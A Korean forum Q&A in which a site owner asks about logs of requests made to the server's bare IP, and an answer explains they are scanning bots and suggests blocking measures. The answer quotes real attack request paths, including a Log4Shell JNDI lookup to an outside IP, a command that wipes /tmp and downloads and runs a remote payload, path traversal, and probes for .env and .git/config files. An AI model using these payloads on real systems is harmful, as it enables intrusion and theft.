사이트ip주소:80/ 로 접근하는 로그들
본문
도메인이 아니라 사이트ip:80로 접근하는 로그들이 잡히고 있어요. 혹시 보안상에 문제가 없을까요? 문제가 있다면 접근 차단을 어떻게 하면 좋을까요?
답변 2
단순 Bot 또는 일종의 brute force Bot 일수 있습니다.
문제가 있는 Bot 의 경우
무차별 대입하다가 뭐 하나 얻어걸릴때 획득되는 정보가 있다면
그걸 가지고 또 장난치거나 다른 공격을 시도할수 있습니다.
/admin
/phpMyadmin
/phpMyAdmin-5.1.2/index.php?lang=en
/phpMyAdmin-5.2.0/index.php?lang=en
/db/phpMyAdmin-3/index.php?lang=en
/_phpmyadmin/index.php?lang=en
/mysql/db/index.php?lang=en
/?fbclid=IwAR09tm8Novp2TUZcQJcUXV2nztXIrUU8ky_g5WxgMQV6HWIdxD8crN92wtY
/wp-admin
/dns-query?dns=4OcBAAABAAAAAAAABmdvb2dsZQNjb20AAAEAAQ
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f
/remote/login?lang=en
/actuator/health
/sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/
/${jndi:ldap://34.124.185.168:8081/Exploit}
/shell?cd+/tmp;rm+-rf+*;wget+103.16.161.29/jaws;sh+/tmp/jaws
/../../mnt/mtd/Config/Account1
/.vscode/sftp.json
/.env
/.git/config
등과 같이 막무가내로 들어오는 경우가 있는데
이때 들어온 요청이 실제로 존재하는 경우,
그리고 프로그램 검증이 허술하게 되어 있거나 민감한 정보가 있다면
서버가 뚫릴 위험도 있습니다.
해결 방법으로는
위험요소를 포함하는 코드/파일 삭제
IP 패턴이 어느정도 일정한 경우 대역 차단
$_SERVER['HTTP_HOST'] 값으로 승인된 도메인이 아닌 경우 차단
Bot 이 아님을 확인하기 위한 CAPTCHA 검증
정도의 방법이 있습니다.
가능하면 보안을 위해 인증이 되지 않은 봇은 차단을 하는게 좋습니다.
